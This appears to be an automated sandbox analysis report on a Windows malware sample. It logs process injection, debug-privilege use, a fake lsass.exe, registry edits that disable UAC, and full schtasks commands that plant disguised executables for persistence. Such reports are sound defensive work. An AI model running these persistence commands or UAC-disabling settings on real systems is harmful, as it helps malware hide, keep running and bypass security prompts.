N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2756 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2756 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\MSOCache\All Users\lsass.exe
PID 2756 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\MSOCache\All Users\lsass.exe
PID 2756 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe C:\MSOCache\All Users\lsass.exe
PID 2000 wrote to memory of 2220 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2220 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2220 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2316 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2316 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2000 wrote to memory of 2316 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2220 wrote to memory of 828 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 2220 wrote to memory of 828 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 2220 wrote to memory of 828 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 828 wrote to memory of 1524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 1524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 1524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 2524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 2524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 828 wrote to memory of 2524 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 1524 wrote to memory of 2596 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 1524 wrote to memory of 2596 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 1524 wrote to memory of 2596 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe
PID 2596 wrote to memory of 2380 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 2380 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 2380 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2596 wrote to memory of 1256 N/A C:\MSOCache\All Users\lsass.exe C:\Windows\System32\WScript.exe
PID 2380 wrote to memory of 2872 N/A C:\Windows\System32\WScript.exe C:\MSOCache\All Users\lsass.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\MSOCache\All Users\lsass.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\MSOCache\All Users\lsass.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe

"C:\Users\Admin\AppData\Local\Temp\25f24f924e296c9d0bb523f1a52159f138a10505062ea1cf2ee4b17cc7b08ac8.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office\Office14\1033\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

